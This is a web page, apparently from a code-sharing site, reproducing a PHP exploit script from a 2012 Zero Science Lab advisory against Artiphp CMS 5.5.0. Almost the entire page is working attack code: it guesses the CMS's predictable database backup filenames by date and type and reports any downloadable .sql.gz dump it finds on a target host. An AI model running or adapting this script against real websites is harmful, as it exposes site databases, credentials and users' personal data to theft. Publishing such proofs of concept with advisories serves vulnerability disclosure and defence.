扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 |
<?php /* Artiphp CMS 5.5.0 Database Backup Disclosure Exploit Vendor: Artiphp Product web page: http://www.artiphp.com Affected version: 5.5.0 Neo (r422) Summary: Artiphp is a content management system (CMS) open and free to create and manage your website. Desc: Artiphp stores database backups using backupDB() utility with a predictable file name inside the web root, which can be exploited to disclose sensitive information by downloading the file. The backup is located in '/artzone/artpublic/database/' directory as 'db_backup_[type].[yyyy-mm-dd].sql.gz' filename. Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.21 PHP 5.3.8 / 5.3.9 MySQL 5.5.20 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2012-5091 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5091.php 15.05.2012 */ error_reporting(0); print "\no==========================================================o\n"; print "||"; print "\n|\tArtiphp CMS 5.5.0 DB Backup Disclosure Exploit |\n"; print "||\n"; print "|\t\t\tby LiquidWorm|\n"; print "||"; print "\no==========================================================o\n"; if ($argc < 3) { print "\n\n\x20[*] Usage: php $argv[0] <host> <port>\n\n\n"; die(); } $godina_array = array('2012','2011','2010'); $mesec_array = array('12','11','10','09', '08','07','06','05', '04','03','02','01'); $dn_array = array('31','30','29','28','27','26', '25','24','23','22','21','20', '19','18','17','16','15','14', '13','12','11','10','09','08', '07','06','05','04','03','02', '01'); $backup_array = array('full','structure','partial'); $host = $argv[1]; $port = intval($argv[2]); $path = "/artiphp/artzone/artpublic/database/"; // change per need. $alert1 = "\033[0;31m"; $alert2 = "\033[0;37m"; foreach($godina_array as $godina) { print "\n\n\x20[*] Checking year: ".$godina."\n\n Scanning: "; sleep(2); foreach($mesec_array as $mesec) { foreach($dn_array as $dn) { print "~"; foreach($backup_array as $backup) { if(file_get_contents("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz")) { print "\n\n\x20[!] DB backup file discovered!\n\n"; echo $alert1; print "\x20==>\x20"; echo $alert2; die("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz\n"); } } } } } print "\n\n\x20[*] Zero findings.\n\n\n" ?> |
体验盒子
